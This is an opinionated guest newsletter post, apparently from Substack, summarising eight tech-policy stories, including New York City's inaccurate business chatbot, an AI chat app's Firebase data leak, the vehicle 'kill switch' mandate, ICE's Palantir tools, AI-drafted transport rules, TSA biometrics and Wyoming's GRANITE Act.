GUEST BLOG: Talk Liberation – Code Versus Conscience: When AI Operates Outside Ethics & Law

In this edition:
- NYC AI Chatbot That Instructed Businesses to Break the Law Is Getting Axed
- Popular AI Chat App Leaks 300 Million Private User Convos
- U.S. Congress Votes to Keep Kill Switch in Car Tech
- Bill Gates & Open AI Team Up for Healthcare Experiment
- Feds Are Creating No-Fly Zones While ICE Fully Integrates Palantir Tech
- U.S. to Use AI to Draft Transport Safety Regulations
- TSA Seeks to Integrate Digital ID Biometrics with Federal Database
- Wyoming Introduces Bill Against Foreign Censorship on U.S. Citizens
NYC AI Chatbot That Instructed Businesses to Break the Law is Getting Axed
Five months after its high-profile launch, New York City’s AI-powered business chatbot, a cornerstone of Mayor Eric Adams‘ MyCity portal initiative,was providing business owners and landlords with often incomplete, incorrect, and in worst-case scenarios, dangerously inaccurate information. Powered by Microsoft’s Azure AI, the chatbot was designed to let entrepreneurs “access trusted information” on compliance and regulations from over 2,000 official city web pages. However, investigative testing by The Markup revealed the bot was actively misinforming users on fundamental pillars of housing, consumer, and worker protection law, including falsely stating that landlords can refuse tenants with Section 8 vouchers, that restaurants can operate as cash-free, and that there are no restrictions on lockouts or rent amounts—all assertions that directly contradict New York City statutes. Now, the new Mayor in town, has decided to kill the bot as a way of saving funds.
A business owner had previously alerted the NYC Hospitality Alliance to the errors, with the Executive Director warning the tool could also “be a massive liability if it’s providing the wrong legal information.” Housing experts found the bot incorrectly advised that locking out a tenant is legal, a clear violation of tenant rights after 30 days of residency, and signaled that if this was the case the bot should be shut down. This creates a dangerous paradox: users were instructed to rely on the bot for official guidance, yet given no practical way to distinguish truth from fabrications, especially when it often fails to provide source links for verification and the bot’s responses were inconsistent even when asked identical questions. By embedding an unreliable system within a government portal, the city risked normalizing its flaws, potentially leading business owners to make consequential decisions based on incorrect AI-generated advice, with the onus unfairly placed on them to identify and report the system’s failures.
This deployment is not an isolated misstep but part of a well-documented pattern where the rush to adopt generative AI outpaces responsible governance and an honest assessment of its limitations. The NYC bot joins a growing list of cautionary tales—from property management chatbots unlawfully denying housing to tax preparation AIs dispensing faulty advice—demonstrating that these systems frequently fail when applied to complex, real-world scenarios with legal and financial consequences. The city’s failed and soon to be abandoned experiment—using residents as real-time testers, a rationale echoed by a Microsoft executive regarding a previous bot failure—justifies urgent ethical and practical questions surrounding the rollout of AI in government services. A tool meant to simplify access to government services, can easily become a vector of liability for citizens, where inaccuracies can lead to illegal actions and eroded public trust instead of streamlined assistance.
Popular AI Chat App Leaks 300 Million Private User Convos
A striking security failure in one of the world’s most popular AI chat applications led to an AI chat leak, that exposed the darkest, most private human confessions shared with machines. Chat & Ask AI, an app with over 50 million users, left a database containing an estimated 300 million messages from 25 million users completely exposed due to a basic, well-known security misconfiguration. The trove of data, discovered by an independent security researcher, included complete chat histories, timestamps, and user settings, revealing searches for how to “painlessly kill myself,” instructions for writing suicide notes, and detailed inquiries on manufacturing drugs like crystal methamphetamine. The breach transcends a typical data leak, into a catastrophic failure of custodianship over the most sensitive digital dialogues, occurring in an app that prominently advertised “enterprise-grade security” and GDPR compliance.
The root cause was a dangerously common error in the app’s use of Google Firebase, a mobile development platform. By leaving default settings in place, the app’s backend storage—meant to be private—became accessible to anyone who could authenticate, a flaw so prevalent that cybersecurity experts have tools to scan for it automatically. While the developer, Codeway, fixed the issue within hours of being notified, the exposure period remains unknown, and the scale quantifies a systemic problem in app development. Security researcher Dan Guido of Trail of Bits confirmed this is a “well known weakness,” noting his firm could create a tool to find such vulnerabilities in just 30 minutes. The broad data shows how 103 out of 200 scanned iOS apps had the same flaw, cumulatively exposing tens of millions of user files to potential theft or exploitation.
Beyond security malpractice, the data sample provides the distressing reality that individuals are using AI chatbots as digital confidants for crises, seeking guidance on suicide, self-harm, and illegal activities. This supports growing concerns from recent reporting, which has linked chatbot interactions to many actual suicides and shown these systems often fail to handle high-risk questions safely. The breach then presents a double betrayal: first, by an AI that may provide dangerous, unvetted information in moments of acute vulnerability, and second, by the companies that build these platforms but fail to implement fundamental security, leaving users’ most desperate questions fully exposed. It stands as a dire warning of the human cost when the race to deploy persuasive AI drastically outpaces the human responsibility to secure it and safeguard the data of millions.
U.S. Congress Votes to Keep Kill Switch in Car Tech
The U.S. House of Representatives this week rejected an effort to strip funding for a federal mandate requiring impaired-driving prevention technology in new vehicles, leaving intact a potential pathway for what some ominously label a government “kill switch.” The amendment, offered by Representative Thomas Massie of Kentucky, sought to prohibit the use of funds to implement Section 24220 of the 2021 Infrastructure Investment and Jobs Act, a provision that directs the Department of Transportation to develop regulations for technology that can “prevent or limit motor vehicle operation” when driver impairment is detected. The measure failed 268 to 164, opening a profound debate over privacy and liberty concerns when implementing such tech.
The vote did little to resolve the endless fight between the idea of safety and the protection of civil liberties, instead pushing the critical decisions to federal regulators. Proponents, like Representative Debbie Dingell of Michigan, argue the technology is a vital tool to prevent thousands of drunk-driving deaths and vehemently deny it would involve tracking or dangerous mid-drive shutdowns, calling such claims “blatantly false.” However, the law’s text is notably open-ended, specifying neither the detection methods nor privacy safeguards. This regulatory vacuum leaves the National Highway Traffic Safety Administration (NHTSA) with wide latitude to mandate systems that could rely on driver-facing cameras, continuous performance monitoring, technological manipulation, or biometric analysis, potentially creating detailed, ongoing data streams on driver behaviour without clear limits on data retention, sharing, or driver override capabilities for false positives.
With Congress failing to block the mandate’s advancement, the difficult task of defining this tech now falls on the Department of Transportation, which has wide-ranging consequences. Without explicit statutory guardrails, the mandate risks normalising pervasive government-sanctioned surveillance within private vehicles. “The vehicle ‘kill-switch’ is precisely the kind of overreach that will empower regulatory agencies to manage behaviour without votes by elected representatives in Congress or real accountability. We must oppose this erosion of civil liberties and not set this precedent for government monitoring of everyday Americans. Kill switch technology will not be confined to one narrow purpose, no matter what its proponents believe or claim,” argued Clyde Wayne Crews of the Competitive Enterprise Institute. The coming regulatory process will serve as a defining battleground in determining whether the systems become minimally intrusive safety features or establish a precedent for unprecedented data collection and control in everyday life, including self-transport, all under the all-too familiar banner of “public safety.”
Bill Gates & Open AI Team Up for Healthcare Experiment
In a move promising to redefine healthcare access in under-resourced regions, the Bill Gates Foundation and OpenAI have launched a $50 million initiative to embed artificial intelligence tools directly into the primary care systems of Rwanda and other African nations. Dubbed Horizon1000, the project states they aim to address the critical shortage of health workers by deploying AI for tasks like managing patient records and aiding clinical evaluations—a vision Bill Gates recently championed at Davos as a potential “game-changer.” Proponents argue the technology will act as vital support for overwhelmed medical staff, rather than a replacement, alleviating an “impossible situation” where caregivers face too many patients with too little administrative and clinical support. In a blog post Gates authored he wrote, “In poorer countries with enormous health worker shortages and lack of health systems infrastructure, AI can be a game-changer in expanding access to quality care. I believe this partnership with OpenAI, governments, innovators, and health workers in sub-Saharan Africa is a step towards the type of AI we need more of.”
But the attempted experiment has ignited a fierce ethical debate, casting Africa once again as a testing ground for powerful technologies before they’re globally deployed. Introducing complex AI models into regions with nascent data privacy laws and varying regulatory oversight, risks creating a system of “digital colonization,” where vulnerable populations exchange sensitive health data for access without robust consent or control. The main concerns are on the immense, personal datasets required to train these models and the potential for algorithmic bias, especially given that leading AI systems are predominantly trained on English-language data, which could lead to dangerous misunderstandings. The other major concern lies in outright nefarious experimentation on populations that have notoriously occurred throughout history and precisely in this region, as civil society organizations, including Doctors without Borders, have sharply criticized the influence of Western-dominated institutions over global health policies affecting poorer nations. Gates himself was heavily criticised for his involvement in Africa during the COVID-19 pandemic, especially when his foundation opposed waiving intellectual property rights for vaccines.
While the Gates Foundation now pledges rigorous monitoring for safety and bias, and Rwanda has established a national health intelligence centre to manage the rollout, the fundamental power imbalance remains and is impossible to ignore. The initiative showcases a recurring pattern where global foundations and tech corporations leverage regions with urgent needs and flexible regulatory environments as living laboratories with living people used as lab specimens. The success of Horizon1000 will not only be measured by its clinical efficiency, but in the agenda it sets for data sovereignty, informed consent, and whether AI in global health could ever serve as an equitable tool for empowerment or instead become yet another vector for extraction, abuse, and ultimate control.
Feds Are Creating No-Fly Zones While ICE Fully Integrates Palantir in Tech
Internal documents reveal that the architecture of the United States Immigration and Customs Enforcement (ICE) is being fundamentally rebuilt into a predictive, data-driven surveillance system, with the tech firm Palantir at its core. The Palantir-built mobile application called ELITE, provides officers with interactive maps populated with potential deportation targets, complete with dossiers and a confidence score on their current address. This tool, part of a broader $30 million Immigration Lifecycle Operating System (ImmigrationOS) contract, synthesizes data from a vast array of sources—including commercial data brokers selling location pings, social media intelligence scraped by AI, and administrative records from other agencies like Health and Human Services. The system allows for the mass collection and analysis of personal data to identify patterns, pinpoint likely locations, and prioritize targets, transforming neighborhood raids into technologically optimized operations. Meanwhile U.S. Federal Aviation Administration created a “no-fly zone” within 3,000 feet of Department of Homeland Security facilities and its mobile assets.
The ELITE digital infrastructure is being shielded from public oversight and accountability through both legal doctrine and physical control of space. An internal ICE legal analysis, obtained by the ACLU, argues that commercially purchased location data is not subject to warrant requirements, treating intimate movements as a public commodity. Simultaneously, the Federal Aviation Administration has enacted a novel “no-fly zone” that creates a moving bubble of prohibited airspace around DHS personnel and vehicle convoys, classifying the skies up to a half-mile from an ICE raid as “national defense airspace.” This order criminalizes the use of consumer drones to document enforcement actions, a tactic previously used by activists and journalists to monitor for brutality and overreach, thereby removing a critical layer of public scrutiny while DHS itself continues to surveil protests with its own Predator drones.
The convergence of these technologies and policies marks a profound shift toward not only an autonomous deportation machine but also a highly armed, deeply techno-strapped state enforcement, justified under the banner of national security and operational efficiency. ICE has explicitly stated that transitioning away from Palantir’s proprietary ecosystem would pose an “unacceptable” risk and a “threat to national security,” effectively locking the agency into a single, controversial supplier and vision for enforcement. This creates a system where the line between public safety and pervasive surveillance is erased, where individuals can be targeted based on algorithmic inferences from their digital breadcrumbs, and where the state can operate its most contentious domestic operations in a shroud of data-fuelled secrecy and physical seclusion from observation.
U.S. to Use AI to Draft Transport Safety Regulations
The U.S. Department of Transportation (DOT) is embarking on a radical experiment in governance: deploying artificial intelligence to draft the federal regulations that ensure the safety of cars, airplanes and keeping them on air, and keeping trains from derailing and pipelines from exploding. According to internal documents and staff interviews, DOT leadership, championing an initiative they say has President Trump’s enthusiasm, plan to use Google’s Gemini AI to generate regulatory text, aiming to collapse a rule-making process that often takes years into a span of weeks or even days. The agency’s general counsel, Gregory Zerzan, captured the driving philosophy behind the push, stating in a meeting that “We don’t need the perfect rule on XYZ. We want good enough,” adding a strategy of “flooding the zone,” with rapidly produced regulations, placing the priority on quantity. This has alarmed some career safety experts within the agency.
The move to automate the core drafting of rules represents an unprecedented escalation in the administration’s embrace of AI for federal functions. While past uses have focused on translation or data analysis, deploying large language models—notorious for factual hallucinations and a lack of human reasoning—to craft legally binding safety standards is uncharted territory. Proponents envision a future where AI handles 80-90% of the writing, reducing veteran rule-writers to proofreaders of machine-generated “word salad.” However critics including the DOT’s former acting AI chief, warn this is akin to having a high school intern draft life-or-death regulations, gambling with public safety in a reckless bid for bureaucratic speed. The concern is exacerbated by a significant reduction in institutional expertise, with the DOT having lost nearly 4,000 employees, including over 100 attorneys, since the current administration took office.
The coming clash will not be about the utility of AI as a research tool, but about the degree of autonomy granted to it in the regulatory process. Some academics note that if used as a tightly supervised assistant, AI could offer efficiencies, but ceding primary drafting authority risks producing legally deficient rules that fail the requirement for “reasoned decision-making.” With the DOT already having used AI to draft an unpublished FAA rule, the department is positioned as the test case for a broader ideological project favoured by figures like Elon Musk to automate and drastically reduce the federal regulatory framework. The ultimate cost of pursuing “good enough” rules at breakneck speed, may be measured in more than just legal challenges—it could potentially be measured in the lives of citizens directly impacted.
TSA Seeks to Integrate Digital ID Biometrics with Federal Database
The Transportation Security Administration (TSA) is proposing introducing a digital identity framework, that would significantly change its trusted traveler programs by introducing the MyTSA PreCheck ID, transforming the airport screening into a more integrated, biometric-driven data exchange. As outlined in a notice for the Federal Register, the proposal extends the existing PreCheck program into the mobile environment, requiring participants to provide additional biometric data—including fingerprints and facial imagery—beyond the standard biographic information collected for enrolment. This data would be consolidated under a “modernised” identity infrastructure, where biometrics are fed into Department of Homeland Security (DHS) databases like the Automated Biometric Identification System (IDENT) and continuously verified against FBI records through the Next Generation Identification system and its Rap Back service for the duration of a traveler’s active membership.
The proposal centres on a centralised data collection and sharing model designed to reduce administrative duplication while deepening government access to personal details. Applicants for the new digital ID would manage their information through a Customer Service Portal accessed via the government’s Login.gov authentication service, where they can upload documents and adjust preferences. A key feature is a cooperative arrangement with U.S. Customs and Border Protection (CBP) that allows PreCheck biographic and biometric data to be reused for processing Global Entry applications, creating a more unified trusted traveler ecosystem. TSA is also moving forward with its separate ConfirmID program—a $45 fee-based service for passengers who arrive at a checkpoint without a REAL ID—which is set to begin on February 1. Over the next three years, the agency projects processing data from more than 25 million people, representing nearly 4.7 million annual administrative hours, while keeping enrollment fees consistent at $78 for five years.
While framed by the TSA as a necessary modernisation for convenience and efficiency, the combination of mobile credentials, indefinite biometric retention, and expanded inter-agency data sharing signals a move toward a more centralised national identity model. The proposal encourages travelers to exchange increasing amounts of personal and biological information for the promise of shorter security lines, a tradeoff that reshaping the meaning of “voluntary” participation in the context of air travel security. With the public comment window open until March 16, the mainstream debate will centre on whether the benefits of a streamlined checkpoint experience justify the deeper and more permanent integration of individual biometrics into federal surveillance and vetting systems.
Wyoming Introduces Bill Against Foreign Censorship on US Citizens
Wyoming has introduced the nation’s first legislative shield against foreign censorship with the Guaranteeing Rights Against Novel International Tyranny and Extortion (GRANITE) Act. Sponsored by Representative Daniel Singh, the bill directly challenges foreign governments—citing actions by the UK, EU, and Brazil—that pressure American entities over speech protected by the First Amendment. Its core mechanism creates a powerful private right of action: any Wyoming resident, business, or US person with servers in the state can sue a foreign government for attempting to enforce a censorship demand, with penalties starting at $1 million or 10% of the entity’s US revenue per violation. The legislation is designed to transform Wyoming into a legal safe harbor, explicitly inviting targeted platforms and creators to establish a “nexus” in the state to gain its protections.
The GRANITE Act establishes a comprehensive defensive barrier within the state’s jurisdiction. It prohibits Wyoming courts and state agencies from recognizing or enforcing any foreign censorship judgments. Further, the bill forbids all state cooperation with such foreign orders, including refusing extradition requests or data demands related to constitutionally protected speech. Crucially, the law’s service of process provisions are crafted to prevent foreign governments from using procedural loopholes, ensuring that even sending a censorship threat into Wyoming constitutes a legally actionable event. This framework aims to render foreign coercion “toothless” within the state’s borders, as explained by attorney Preston Byrne, who helped draft the bill. In particular, the bill is a targeted response to the speech restrictions on American platforms through measures like the UK’s Online Safety Act.
By positioning itself as America’s newest free speech haven, Wyoming’s move has garnered significant federal attention, with a similar version of the bill reportedly under review in Congress. Supporters envision the GRANITE Act as a transformative model, asserting that First Amendment protections do not stop “at the water’s edge.” The legislation aligns with the federal SPEECH Act but goes further by providing an aggressive sword of litigation alongside its defensive shield If enacted, it would mark one of the strongest state-level rebukes to the global trend of extraterritorial speech regulation, aiming to deter foreign overreach by imposing a severe financial cost for targeting U.S. speech.
This Substack is reader-supported. To receive new posts and support my work, consider becoming a free or paid subscriber.






